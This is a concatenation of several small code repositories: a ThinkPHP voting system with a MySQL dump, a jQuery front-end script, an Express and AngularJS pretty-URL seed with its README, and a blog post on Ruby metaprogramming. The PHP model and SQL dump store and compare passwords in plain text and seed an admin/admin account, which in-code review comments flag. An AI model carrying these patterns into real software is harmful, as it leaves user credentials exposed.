        $postMessage = Request::instance()->post();
        $user = new User();
        if (!$this->isLogin()) {
            $message = "还未登录,不能进行此操作";
        } elseif (!$user->isAdmin(Session::get("name"))) {
            $message = "只有管理员才可以进行该操作";
        } elseif (!$this->isAddUser($postMessage)) {
            $message = "信息不完整";
        } elseif ($user->hasUser($postMessage["username"])) {
            $message = "该登录名已被注册";
        } else {
            $captchaJudge = $this->validate(array('captcha' => $postMessage['captcha']), ['captcha|验证码'=>'require|captcha']);
            if ($captchaJudge === true) {
                // Same charset rule for username and password: letters,
                // digits and inner underscores (no leading/trailing "_").
                if (!preg_match('/^(?!_)(?!.*?_$)[a-zA-Z0-9_]+$/', $postMessage['username'])) {
                    $message = "用户名非法";
                } elseif (!preg_match('/^(?!_)(?!.*?_$)[a-zA-Z0-9_]+$/', $postMessage['pwd1'])) {
                    $message = "密码非法";
                } elseif ($postMessage['pwd1'] != $postMessage['pwd2']) {
                    $message = "两次密码不一致";
                } else {
                    $userInfo = $user->getUser(Session::get("name"));
                    if ($userInfo['grade'] < $postMessage['grade']) {
                        // Admins may only create users up to their own grade.
                        $message = "你不能添加该等级用户";
                    } else {
                        $user->addUser($postMessage);
                        $status = "success";
                        $message = "注册成功";
                    }
                }
            } else {
                $message = "验证码错误";
            }
        }
        return json_encode(['status' => $status, 'message' => $message]);
    }
/**
* 根据Session判断是否登陆
* @return bool
*/
private function isLogin() : bool {
$user = new User();
return Session::has("name") && $user->hasUser(Session::get("name"));
}
/**
* 判断是否符合添加用户要求
* @param array $postMessage
* @return bool
*/
private function isAddUser(array $postMessage) : bool {
$is = false;
$requireMessage = ["username", "pwd2", "pwd1", "captcha", "admin", "grade"];
foreach ($postMessage as $key => $value) {
if (in_array($key, $requireMessage) && $value != "") {
$is = true;
continue;
} else {
$is = false;
break;
}
}
return $is;
}
public function test() {
// $user = new User();
// var_dump($user->isAdmin("admin"));
// $vote = new Vote();
// return $vote->getVoteByGrade(0);
// dump(json_decode('{"" : "w","" : "w"}', true));
// $files = request()->file();
// foreach($files as $key => $file){
// // 移动到框架应用根目录/public/uploads/ 目录下
// $info = $file->validate(['size' => 2048 * 1024])->move(ROOT_PATH . 'public' . DS . 'uploads');
// if($info){
// echo $key;
// echo $info->getSaveName();
// }else{
// // 上传失败获取错误信息
// echo $file->getError();
// }
// }
// echo date('Y-m-d');
//
// $arr = [];
// for ($i = 0; $i < 4; ++$i) {
// $arr[] = $i;
// }
// dump($arr);
// var_dump(strtotime("2016-2-4 12:3:3") );
// var_dump(time());
// echo "<input type='checkbox' id='1' value='2'><script>alert(document.getElementById('1').value)</script>";
// var_dump(json_decode("{'1':'23',' ':' '}"));
// $string = '{"1":"123","": ""}';
// var_dump($string);
// $string = {"firstName": "Brett"};
// var_dump(json_decode( $string, true));
// $string = "null0_dasdasf";
// var_dump(explode("_",$string)[0]);
// $option = new OptionLog();
// dump($option->addNumber([2 => '13']));
// echo "<script>alert('' + 1)</script>";
// $id = "63";
// dump($option->getResult(['11', '12', '13']));
// dump(in_array("10",$option->getAllOptionIdByVoteId($id)));
// $arr = array(
// "a" => 12,
// );
// dump(in_array("12", $arr));
// $input = ['2' => 3, '3' => 4, '4' => 3];
// $result = array_unique($input);
// dump($result);
echo preg_match('/^(?!_)(?!.*?_$)[a-zA-Z0-9_]+$/',"eqw") ? 'yes' : 'no';
}
}
<file_sep><?php
/**
* User Model
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/10
* Time: 17:58
*/
namespace app\index\model;
use think\Model;
class User extends Model {
/**
 * 添加用户
 * Persists a new user row from the (already validated) add-user form post.
 *
 * Bug fixed: the password key had been mangled to '<PASSWORD>' (a redaction
 * artifact); the controller posts the password as 'pwd1' (checked against
 * 'pwd2' before this is called), so 'pwd1' is the field that gets stored.
 * NOTE(review): the password is saved in plain text — hash it (e.g. with
 * password_hash()) together with loginCheck() before production use.
 * @param array $postMessage validated POST data (username, pwd1, grade, admin)
 */
public function addUser(array $postMessage) {
    $newUser = [
        "username" => $postMessage['username'],
        "pwd" => $postMessage['pwd1'],
        "grade" => $postMessage['grade'],
        "admin" => $postMessage['admin']
    ];
    $this->save($newUser);
}
/**
 * 登陆检查
 * Counts the user rows whose username AND password both match the supplied
 * values; the caller treats a non-zero count as a successful login.
 * NOTE(review): the password is compared in plain text against the `pwd`
 * column — credentials should be hashed before this ships.
 * @param string $cUserName
 * @param string $cPwd
 * @return int 返回符合条件的数目,0即表示没有,登录失败
 *             (number of matching rows; 0 means the login failed)
 */
public function loginCheck(string $cUserName, string $cPwd) : int {
    $where = array(
        "username" => $cUserName,
        "pwd" => $cPwd
    );
    return $this->where($where)->count();
}
/**
 * 根据姓名判断用户是否存在
 * True when at least one row carries the given username.
 * @param string $username
 * @return bool
 */
public function hasUser(string $username) : bool {
    $matches = $this->where(["username" => $username])->count();
    return $matches > 0;
}
/**
 * 返回个人信息
 * Fetches the first row matching the given username and returns its raw
 * attribute array.
 * NOTE(review): errors out when no such user exists ($result[0] is missing),
 * and reaches into the model's internal ->data property rather than using
 * toArray() — confirm against the installed ThinkPHP version.
 * @param string $gUserName
 * @return false|\PDOStatement|string|\think\Collection
 */
public function getUser(string $gUserName) {
    $where = array(
        "username" => $gUserName
    );
    $result = $this->where($where)->select();
    return $result[0]->data;
}
/**
 * 根据用户名判断是否是管理员
 * True when the user exists and its `admin` column is truthy.
 *
 * Bug fixed: the original returned $result[0] unconditionally, which raised
 * an undefined-offset notice (yielding null) when the username did not
 * exist; an unknown user is now simply "not an admin".
 * @param string $username
 * @return bool
 */
public function isAdmin(string $username) : bool {
    $result = $this->where(["username" => $username])->column("admin");
    return !empty($result) && (bool) $result[0];
}
}<file_sep>/*
Navicat MySQL Data Transfer
Source Server : localhost_3306
Source Server Version : 50505
Source Host : 127.0.0.1:3306
Source Database : vote_system
Target Server Type : MYSQL
Target Server Version : 50505
File Encoding : 65001
Date: 2017-03-20 22:44:36
*/
SET FOREIGN_KEY_CHECKS=0;
-- ----------------------------
-- Table structure for option
-- ----------------------------
DROP TABLE IF EXISTS `option`;
CREATE TABLE `option` (
  -- NOTE(review): vote_id has no FK to vote.id despite InnoDB; referential
  -- integrity is enforced by the application only.
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `vote_id` int(11) NOT NULL,
  -- option label shown to voters
  `content` varchar(255) DEFAULT NULL,
  -- relative upload path of the option image (the literal string 'null' when absent)
  `img` varchar(255) DEFAULT NULL,
  -- running tally of votes received by this option
  `number` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of option
-- ----------------------------
INSERT INTO `option` VALUES ('1', '1', 'Go语言', 'null', '1');
INSERT INTO `option` VALUES ('2', '1', 'Linux', '20170226\\cc95a43b36e351ef26a05a9e688e4165.jpg', '1');
INSERT INTO `option` VALUES ('3', '1', 'null0_', '20170226\\dd16d448b7c54287cb81ca4a73b987af.png', '0');
INSERT INTO `option` VALUES ('4', '2', 'Go语言', 'null', '0');
INSERT INTO `option` VALUES ('5', '2', 'Linux', '20170226\\719fdd5c832c5fb23181c388e32cbad8.jpg', '0');
INSERT INTO `option` VALUES ('6', '2', 'null0_', '20170226\\ab32d3857a06ba036bb7453d1dd4e0fb.png', '0');
-- ----------------------------
-- Table structure for option_log
-- ----------------------------
DROP TABLE IF EXISTS `option_log`;
CREATE TABLE `option_log` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  -- NOTE(review): per the seed rows, `log` stores the chosen option's id as
  -- text — confirm against the OptionLog model.
  `log` varchar(255) DEFAULT NULL,
  `op_time` datetime DEFAULT NULL,
  `username` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 ROW_FORMAT=COMPACT;
-- ----------------------------
-- Records of option_log
-- ----------------------------
INSERT INTO `option_log` VALUES ('1', '1', '2017-02-26 14:44:41', 'admin');
INSERT INTO `option_log` VALUES ('2', '2', '2017-02-26 14:44:41', 'admin');
-- ----------------------------
-- Table structure for user
-- ----------------------------
DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(255) NOT NULL,
  -- NOTE(review): passwords are stored in plain text (see the 'admin'/'admin'
  -- seed row) — they should be hashed before production use.
  `pwd` varchar(255) DEFAULT NULL,
  -- privilege level used to gate participation in graded votes
  `grade` int(2) DEFAULT NULL,
  -- 1 = administrator
  `admin` int(2) DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of user
-- ----------------------------
INSERT INTO `user` VALUES ('1', 'admin', 'admin', '4', '1');
-- ----------------------------
-- Table structure for vote
-- ----------------------------
DROP TABLE IF EXISTS `vote`;
CREATE TABLE `vote` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  -- username of the creator
  `create_name` varchar(255) DEFAULT NULL,
  `title` varchar(255) DEFAULT NULL,
  `introduction` varchar(255) DEFAULT NULL,
  -- minimum user grade required to participate
  `grade` int(2) DEFAULT NULL,
  `end_time` datetime DEFAULT NULL,
  `create_time` datetime DEFAULT NULL,
  -- 1 = anonymous vote (no per-user log is shown on the result page)
  `anonymity` int(2) DEFAULT NULL,
  -- semantics unclear from the schema alone (ballots cast? max picks?) --
  -- TODO confirm against the Vote model
  `vote_number` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of vote
-- ----------------------------
INSERT INTO `vote` VALUES ('1', 'admin', '2017/2/26', '投票介绍', '2', '2017-02-26 14:50:00', '2017-02-26 14:43:42', '0', '2');
INSERT INTO `vote` VALUES ('2', 'admin', '2017/2/26_2', '投票介绍', '1', '2017-02-26 16:00:00', '2017-02-26 14:46:25', '1', '1');
-- ----------------------------
-- Table structure for vote_log
-- ----------------------------
DROP TABLE IF EXISTS `vote_log`;
CREATE TABLE `vote_log` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `vote_time` datetime DEFAULT NULL,
  -- NOTE(review): per the seed row, `log` appears to hold the vote's id as
  -- text -- confirm against the VoteLog model.
  `log` varchar(255) DEFAULT NULL,
  `username` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of vote_log
-- ----------------------------
INSERT INTO `vote_log` VALUES ('1', '2017-02-26 14:44:41', '1', 'admin');
<file_sep><?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006-2016 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: 流年 <<EMAIL>>
// +----------------------------------------------------------------------
// 应用公共文件
/**
 * 获取footer
 * Builds the shared page-footer markup with the current year interpolated
 * into the copyright line.
 * @return string footer HTML fragment
 */
function footer() : string {
    $year = date('Y');
    return "<footer data-am-widget=\"footer\"
class=\"am-footer am-footer-default\"
data-am-footer=\"{ }\">
<div class=\"am-footer-miscs \">
<p>CopyRight©$year <a href='https://blog.coderwu.com' target='_blank'>coderWu</a></p>
</div>
</footer>";
}
/**
 * 获取header
 * Builds the shared top navigation bar; $title becomes the brand text and
 * the menu links are prefixed with the configured WEB_ROOT.
 *
 * Bug fixed: the user-name <button id="name"> was never closed, producing
 * invalid markup — the missing </button> has been added.
 * @param string $title page title shown in the navbar brand
 * @return string header HTML fragment
 */
function getHeader(string $title) : string {
    return '<header class="am-topbar am-topbar-inverse"><h1 class="am-topbar-brand">
<a href="#">' . $title . '</a></h1>
<button class="am-topbar-btn am-topbar-toggle am-btn am-btn-sm am-btn-success am-show-sm-only" data-am-collapse="{target: \'#doc-topbar-collapse\'}">
<span class="am-sr-only">导航切换</span> <span class="am-icon-bars"></span></button>
<div class="am-collapse am-topbar-collapse" id="doc-topbar-collapse">
<ul class="am-nav am-nav-pills am-topbar-nav">
<li><a href="' . \think\Config::get("WEB_ROOT") . '/public/index.php/index/Index/votePage">首页</a></li>
<li><a href="' . \think\Config::get("WEB_ROOT") . '/public/index.php/index/Index/createVote">发起投票</a></li>
<li><a id="admin">添加用户</a></li>
</ul><div class="am-topbar-right">
<button class="am-btn am-btn-primary am-topbar-btn am-btn-sm" id="name"></button>
</div></div></header>';
}
"SQL",
"Text",
"PHP"
] | 13 | PHP | Sweetmile/votingSystem | 7fae86f7d692ee7f981010f12452038bbe235f81 | 3cb8663182b69737851d13e62ac134bdf718efa1 |
refs/heads/master | <file_sep>var texts = ["좋은 원재료 ", "다양한 영양 파우더 ", "최적의 블렌딩 노하우"];
// Typewriter effect: cycles forever through the phrases in `texts`
// (declared above), revealing one more character of the current phrase
// every 350ms inside <span class="type">.
//
// Cleanup: the animation state used to live in mutable globals and the DOM
// was re-queried on every tick; both now live once inside the closure.
(function () {
    var count = 0;  // index of the phrase currently being typed
    var index = 0;  // number of characters revealed so far
    var target = document.querySelector('span.type');

    function type() {
        if (count === texts.length) {
            count = 0;
        }
        var currentText = texts[count];
        var letter = currentText.slice(0, index++);
        target.textContent = letter;
        if (letter.length === currentText.length) {
            // Whole phrase shown: move on to the next one.
            count++;
            index = 0;
        }
        setTimeout(type, 350);
    }

    type();
}());
<file_sep> const refresh = $('.refresh > div a span');
// Caption <span> elements inside each smoothie category card; the hover
// handler below swaps their text between the English category title and
// the Korean description.
const vitamin = $('.vitamin > div span');
const fitness = $('.fitness > div span');
const kids = $('.kids > div span');
const greek = $('.greek > div span');
const local = $('.local > div span');
// Maps each #smoothie grid cell (by index) to its caption element and the
// two texts it toggles between: the English category title (default) and
// the Korean description (shown while hovered).
//
// Fixes over the original 12-branch copy-paste version:
//  * one consistent code path; the refresh branch no longer misses the
//    'transition' rule the other five set;
//  * strict equality throughout (the hover-out refresh branch used `==`);
//  * the stray $(this).css('line-height','1.4rem') that the refresh branch
//    applied to the grid cell and never reverted was dropped as an apparent
//    copy-paste leftover — confirm visually.
const smoothiePanels = [
    { el: refresh, title: 'REFRESH', desc: '과일듬뿍 영양 가득한 기분전환 스무디' },
    { el: vitamin, title: 'VITAMIN UP', desc: '활력에너지와 비타민C 충전 스무디' },
    { el: fitness, title: "fitness <br>&<br> slim", desc: "운동 전 후 단백질 보충 스무디와 <br> 다이어터를 위한 슬림 스무디" },
    { el: kids, title: 'kids', desc: '아이들에게 꼭 필요한 <br>유산균과 비타민을 듬뿍 넣은 스무디' },
    { el: greek, title: 'greek <br> yorgurt ', desc: '장시간 자연 발표시킨 그리스식 <br> 저지방 요거트 스무디 ' },
    { el: local, title: 'local <br> & <br> veggie', desc: '우리 땅에서 자란 몸에 좋은 열매와 <br>채소를 가장 맛있게 먹을 수 있는 스무디 ' }
];

$('#smoothie .s_grid > div').hover(function () {
    // Mouse enter: show the Korean description in the body font.
    const panel = smoothiePanels[$(this).index()];
    if (!panel) return;
    panel.el.html(panel.desc);
    panel.el.css('font-family', 'Noto Sans KR, sans-serif');
    panel.el.css('transition', '0.4s ease');
    panel.el.css('font-size', '1.4rem');
}, function () {
    // Mouse leave: restore the English title in the display font.
    const panel = smoothiePanels[$(this).index()];
    if (!panel) return;
    panel.el.html(panel.title);
    panel.el.css('font-family', 'Fredoka One, cursive');
    panel.el.css('transition', '0.4s ease');
    panel.el.css('font-size', '2rem');
});
| 45267af8105b6566a3f1dc61c7a673033bf5beea | [
"JavaScript"
] | 2 | JavaScript | Taeyoung1102/portfolio190509 | 13d9facc8c60f3824be4d8915f58023027518578 | 9494dec453baec937dace5aad3e8a0b34a9e8d51 |
refs/heads/master | <file_sep># Motivis-Extension
Welcome to the Motivis-Extension project! The purpose of this chrome extension is to allow for a greater connectivity among apprentices in the CareerWise Colorado program. Since the bootcamp is over, networking and connecting are difficult since there is no easy way to find contact information and other social media links.
Concept figures showcasing my idea will be added here soon. I want this to be a learning experience for everyone involved, so feel free to constribute and expand the project.
## Phase 1 ##
I'm going to develop a hard-coded example of what I imagine will show up on everyone's profile. This has been accomplished and Phase 2 is now in development.
## Phase 2 ##
Phase 2 is to make this extension customizable so everyone has their own unique links to their respective social media links. There are a few things that need to be changed in order for this to work:
-- Hard code in (not ideal, but secure until better solution is thought of) the links of whoever wants them.
-- Any social media links that aren't put in shouldn't show up on the person's profile.
### Future expansion ideas ###
A few ideas on how to extend the extensions capabilities:
-- Change the background image to a customizable image.
-- Have a report feature so innapropriate content gets taken down.
-- There needs to be an options page to edit the links easily for any given profile (need to figure out how to secure this page).<file_sep>var twitterURL = chrome.extension.getURL("images/twitter.png");
var linkedinURL = chrome.extension.getURL("images/linkedin-logo.png");
var snapchatURL = chrome.extension.getURL("images/snapchat.png");
var facebookURL = chrome.extension.getURL("images/social-facebook-icon.png");
var githubURL = chrome.extension.getURL("images/github.png");
function openForm(){
window.open('https://goo.gl/forms/ams8ht436efujegy1');
}
// Twitter Link
$(".navItems").append('<li><a target="_blank" href="https://www.twitter.com/mrjustpeachy"> <img id="twitter-icon" src="' + twitterURL + '" alt="Twitter Logo" height="30px" /> </a></li>');
// Linkedin Link
$(".navItems").append('<li><a target="_blank" href="https://www.linkedin.com/in/dillonpietsch/"> <img id="linkedin-icon" src="' + linkedinURL + '" alt="Linkedin Logo" height="30px" /> </a></li>');
// Github Link
$(".navItems").append('<li> <a target="_blank" href="https://github.com/MrJustPeachy"> <img id="github-icon" src="' + githubURL + '" alt="Github Logo" height="30px" /> </a></li>');
// Button for people to submit their own information
$(".navItems").append('<li style="float: right; margin-right: 5%;"><input type="button" value="Get your social media buttons for your profile!" class="btn primary-btn" onclick="window.open(\'https://goo.gl/forms/ams8ht436efujegy1\')" /> </li>')
/* WORK IN PROGRESS
// Snapchat Link
$(".user-information").append('<a href="https://www.twitter.com/mrjustpeachy"> <img id="snap-icon" src="snap.png" alt="Snapchat Logo" height="40" width="40"/>');
document.getElementById("snap-icon").src = snapchatURL;
// Facebook Link
$(".user-information").append('<a href="https://www.twitter.com/mrjustpeachy"> <img id="facebook-icon" src="facebook.png" alt="Facebook Logo" height="40" width="40"/> </a>');
document.getElementById("facebook-icon").src = facebookURL;
*/ | 6658a3e9a09fb41461b6e957a212b7636e41e4c0 | [
"Markdown",
"JavaScript"
] | 2 | Markdown | MrJustPeachy/Motivis-Extension | a1204a05c69fa41acf7f246af2147ae7385cdda1 | c20c40308b6f06016f0290aa0fbf1a7d3dd6edf3 |
refs/heads/master | <repo_name>ngscripts/angular-pretty-url-seed<file_sep>/js/controllers/homeController.js
/**
* Created by ulhaq on 4/7/2017.
*/
// Home page controller: publishes the heading rendered by basic.html.
app.controller('homeCtrl', function ($scope) {
    var appName = appResources.options.appName;
    $scope.pageName = 'Home Controller' + appName;
});
/**
* Created by ulhaq on 4/7/2017.
*/
var express = require('express');
var path = require('path');

var expressApp = express();

// Port the production bundle is served on.
expressApp.set('port', 8888);

// Serve the compiled assets out of /build.
expressApp.use(express.static(path.join(__dirname, '/build')));

// HTML5-mode (pretty URL) fallback: any route the static middleware did not
// match must return index.html so the Angular router can resolve it
// client-side. Bug fixed: the original passed the index.html file path to
// express.static(), which expects a directory root and never served the
// page; res.sendFile() is the correct mechanism.
expressApp.use('/*', function (req, res) {
    res.sendFile(path.join(__dirname, 'build', 'index.html'));
});

var server = expressApp.listen(expressApp.get('port'), function () {
    var port = server.address().port;
    console.log('Production Magic Happening on Port : ' + port);
    // Fixed: the original printed "Acces URL : http://localhost" without the
    // port, which is not where the server actually listens.
    console.log('Access URL : http://localhost:' + port);
});
/**
* Created by ulhaq on 4/7/2017.
*/
// About page controller: publishes the heading rendered by basic.html.
app.controller('aboutCtrl', function ($scope) {
    var appName = appResources.options.appName;
    $scope.pageName = 'About Controller' + appName;
});
/**
* Created by ulhaq on 4/3/2017.
*/
'use strict';
// Root Angular module; its dependency list is assembled in appConfig.js.
var app = angular.module(appResources.options.appName, allPreSources);
// Route table plus HTML5 ("pretty URL") mode. Both routes render the same
// template under the same controllerAs alias; only the controller differs.
app.config(function ($routeProvider, $locationProvider) {
    var templateUrl = '/assets/templates/basic.html';

    $routeProvider
        .when('/', {
            controller: 'homeCtrl',
            templateUrl: templateUrl,
            controllerAs: 'ctrl'
        })
        .when('/about', {
            title: 'About',
            controller: 'aboutCtrl',
            templateUrl: templateUrl,
            controllerAs: 'ctrl'
        })
        .otherwise({redirectTo: '/'});

    $locationProvider.html5Mode(true);
});
app.run(['$rootScope', function ($rootScope) {
    // Expose the app name to every template.
    $rootScope.appName = appResources.options.appName;

    // Keep the document title in sync with the active route. $$route is a
    // private ngRoute property, but it is the only place the custom `title`
    // key from the route table is surfaced.
    $rootScope.$on('$routeChangeSuccess', function (event, current) {
        var title = appResources.options.appName;
        // Bug fixed: `current` carries no $$route for redirect/otherwise()
        // events, so the original threw a TypeError on unknown URLs; also
        // tightened the loose != comparison.
        var route = current && current.$$route;
        if (route && typeof route.title !== "undefined" && route.title !== '') {
            title = title + ' - ' + route.title;
        }
        $rootScope.title = title;
    });
}]);
/**
* Created by ulhaq on 4/10/2017.
*/
/**
 * Central application configuration: the app's name/url plus the Angular
 * module dependency lists that app.js feeds into angular.module().
 */
var appResources = {
    options: {
        appName: 'app',
        url: 'app/url'
    },
    libraries: ['ngRoute', 'ngAnimate', 'ngSanitize', 'ngTouch'],
    services: []
};
var allPreSources = appResources.libraries.concat(appResources.services);<file_sep>/README.md
# `angularjs-pretty-url-seed` — The only HTML 5 Mode Routing Seed for Angularjs with Build and Server
This project is an application skeleton for Angularjs web app with pretty URLS, server everything set up in advance.
You can use it to quickly bootstrap your angular webapp projects and dev environment for these projects.
The seed contains a sample AngularJS application and is preconfigured to install the Angular
framework and a bunch of development and testing tools for instant web development gratification.
The seed app has a few controllers, services, directives and components. It even shows how to structure your application
in a good way so that you can develop a complex structure easily while staying DRY (Don't Repeat Yourself).
The seed is very easy to use; most of the work is configuration.
## Getting Started
To get you started you can simply clone the `angular-pretty-url-seed` repository and install the dependencies:
### Prerequisites
You need git to clone the `angular-pretty-url-seed` repository. You can get git from [git-scm.com](http://git-scm.com/).
We also use a number of Node.js tools to initialize and test `angular-seed`. You must have Node.js
and its package manager (npm) installed. You can get them from [nodejs.org](https://nodejs.org/).
### Clone `angular-pretty-url-seed`
Clone the `angular-pretty-url-seed` repository using git:
```
git clone https://github.com/ngscripts/angular-pretty-url-seed.git
cd angular-pretty-url-seed
```
If you just want to start a new project without the `angular-pretty-url-seed` commit history then you can do:
```
git clone --depth=1 https://github.com/ngscripts/angular-pretty-url-seed.git <your-project-name>
```
The `depth=1` tells git to only pull down one commit worth of historical data.
### Install `gulp` globally using `npm`
```
npm install -g gulp
```
Don't forget to use `sudo` while working in Linux.
### Install Dependencies
We have two kinds of dependencies in this project: tools and Angular framework code. The tools help
us manage and test the application.
* We get the tools we depend upon via `npm`, the [Node package manager][npm].
* We get the Angular code via `bower`, a [client-side code package manager][bower].
* In order to run the end-to-end tests, you will also need to have the
[Java Development Kit (JDK)][jdk] installed on your machine. Check out the section on
[end-to-end testing](#e2e-testing) for more info.
We have preconfigured `npm` to automatically run `bower` so we can simply do:
```
npm install
```
Behind the scenes this will also call `bower install`. After that, you should find out that you have
two new folders in your project.
* `node_modules` - contains the npm packages for the tools we need
* `app/bower_components` - contains the Angular framework files
*Note that the `bower_components` folder would normally be installed in the root folder but
`angular-seed` changes this location through the `.bowerrc` file. Putting it in the `app` folder
makes it easier to serve the files by a web server.*
### Run the Application in Development Mode
You can run the development server directly — no watchers required:
```
npm run serve
```
### Build the Application
Build the Application to `/build` folder using the following Command:
```
npm run build
```
### Run the Application using Production Server
Run the Application from `/build` folder using the following Command:
```
npm run serve-prod
```
### ----- ENJOY ---- | f5307cf4287a6083cff084d6be8631b31fc5092d | [
"JavaScript",
"Markdown"
] | 6 | JavaScript | ngscripts/angular-pretty-url-seed | 5b67b71d51ebc07a68015b8b9eb306e3d8d976b1 | 13d43095cd8dd79703bee3d5e93be40389d1e9bb |
refs/heads/main | <repo_name>mithrandirum/express.checkpoint<file_sep>/app.js
const express = require('express');
const path = require('path');

const app = express();
const port = 4000;

// Pug templates live in ./views.
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

// Working-hours guard (the original called this `myLogger`, but it gates
// requests rather than logging them): serve pages only Monday-Friday,
// 09:00-17:59 server-local time; everything else gets the "unavailable"
// message.
//
// Bugs fixed:
//  * a weekend request made between 9 and 17 matched the outer `if` but not
//    the inner one, so neither next() nor res.send() ran and the request
//    hung with no response;
//  * `day < 5` excluded Friday even though the intent is working days —
//    changed to `day <= 5`; TODO confirm against the intended schedule.
const workingHoursOnly = function (req, res, next) {
    const now = new Date();
    const hours = now.getHours();
    const day = now.getDay(); // 0 = Sunday ... 6 = Saturday
    if (hours >= 9 && hours <= 17 && day >= 1 && day <= 5) {
        next();
    } else {
        res.send('sorry , service is unavailable at the moment , checkout time schedule for further information');
    }
};

app.use(workingHoursOnly);

app.get('/', (req, res) => {
    res.render('home-page');
});

app.get('/services', (req, res) => {
    res.render('our-services');
});

app.get('/contact', (req, res) => {
    res.render('contact-us');
});

app.listen(port);
"JavaScript"
] | 1 | JavaScript | mithrandirum/express.checkpoint | 247d457114667405af272a4d6a15addab2a6eba2 | fac1c56107a954885e03eb3a12ac2aa003697d0a |
refs/heads/master | <repo_name>Omnipresent/omnipresent.github.com<file_sep>/_posts/2012-03-30-hackers-language.markdown
---
layout: post
title: Hackers Language
date: 2012-03-30
categories: [ruby,meta]
---
The more I take a closer look at Ruby as a language, the more I feel it is a "Hackers Language". It really does make programming fun again; take a look at [why's poignant guide to Ruby](http://mislav.uniqpath.com/poignant-guide/book/chapter-2.html#section1). After working on a few Rails projects, I realized I didn't have a decent hold on Ruby and how the internals of the language really work. So I decided to kick it up a notch and step into the "ninja" territories of Ruby. Along with [githubbing](https://github.com/Omnipresent), I picked up pragprog's "Metaprogramming in Ruby". This is a hell of a book, not just for technical reasons but for the writing style as well. Most other technical books spend endless pages explaining a detailed core principle, not realizing that they lost the reader long back in the explanation. Metaprogramming in Ruby makes you pair-program with "Bill", the fictional, more seasoned Ruby developer, in a one-on-one communication style of writing that I've read in novels.
Enough about book, this post is about going through some of the key metaprogramming concepts I've learned from the book and my own digging around github projects. Having spent a long time in the Java world, the concepts below made me embrace Ruby even further.
## Method Missing
`Kernel#method_missing()` gets called whenever a missing method is called and returns a NoMethodError. By overriding `method_missing()`, we can intercept the method that was intended to be called and do various different things with it. Messages sent to `method_missing()` can be processed by the receiver even though the called method isn't defined. This, for obvious reasons, is known as a _Ghost Method_. There are great examples of how to utilize `method_missing()` but the trivial code below will illustrate its power. We'll call a `plus()` method on a `Fixnum` class to add two numbers.
{% highlight ruby %}
irb(main):001:0> 1.plus(5) #=>NoMethodError: undefined method plus
class Fixnum
def method_missing(id, *args)
return self + args[0] if id =~ /plus/
end
end
irb(main):048:0> 1.plus(2) #=> 3
{% endhighlight %}
In the above code we open the `Fixnum` class and intercept messages by overriding `method_missing`. So if a `plus` is called on a `Fixnum`, we're catching the method with `method_missing()` and passing it onto the actual `+` method. Pretty nifty eh! But these `Ghost Methods` can become a nightmare when you are hunting for a bug in a large codebase. If the receiver already has an `instance_method` defined as the one you are trying to define with `method_missing` (in our case, if `plus` was already defined on `Fixnum` class) then there will be a clash and piece of code residing in your defined method will never be reached. Good way to overcome this issue is to have a `BlankSlate` class in which pre-existing instance_methods can be undefined using `undef_method`. The class below removes all `instance_methods` leaving behind only `object_id`, `instance_eval` and methods beginning with `__`
{% highlight ruby %}
class CleanSlate
def self.hide(name)
if instance_methods.include?(name) and
name !~ /^(__|instance_eval|object_id)/
undef_method name
end
end
instance_methods.each {|m| hide(m)}
end
puts CleanSlate.instance_methods #=>[:object_id, :instance_eval, :__send__, :__id__]
{% endhighlight %}
The closest thing I've found to implementing `method_missing` in Java is [Dynamic Proxy](http://www.ibm.com/developerworks/java/library/j-jtp08305/index.html)
## Blocks and Closures
Blocks are pieces of code that are ready to run and can be passed around. It uses bindings that are there at the moment when its called and parameters can be passed to them as well. The `yield` keyword actually runs the piece of code. Let's look at an example of a fibonacci series
{% highlight ruby %}
def fibupto(max)
n1, n2 = 1,1
while (n1 <= max)
yield n1
n1, n2 = n2, n1+n2
end
end
fibupto(10) {|f| print f, " "} #=> 1, 1, 2, 3, 5, 8
{% endhighlight %}
In the above snippet, the variable `f` receives the value passed to the `yield` for each iteration, so the block prints the calculated numbers. Now let's look at a practical example of how a closure can be helpful. If you are from the Java world then seeing your code base littered with code like below probably ruins your day.
{% highlight java %}
BufferedInputStream bis = null;
try {
    bis = ...;
    ... ; // Perform action with bis
} finally {
    if (bis != null)
        bis.close();
}
{% endhighlight %}
To fix this problem in Java, Josh Bloch wrote the original proposal for [Automatic Resource Management Blocks](https://docs.google.com/View?docid=dffxznxr_1nmsqkz). This has been added to Java 7's [features](http://docs.oracle.com/javase/7/docs/technotes/guides/language/try-with-resources.html). Basically, whatever is inside the `try` block will be disposed of automatically. Let's do the same thing in Ruby using blocks!
{% highlight ruby %}
class TestTry < Test::Unit::TestCase
class Resource
def close
@close = true
end
def closed?
@close
end
end
def test_disposes_of_resource
r = Resource.new
try (r) {}
assert r.closed?
end
def test_disposes_of_resources_in_case_of_exception
r = Resource.new
assert_raises(Exception) {
try(r) {
raise(Exception)
}
}
assert r.closed?
end
end
{% endhighlight %}
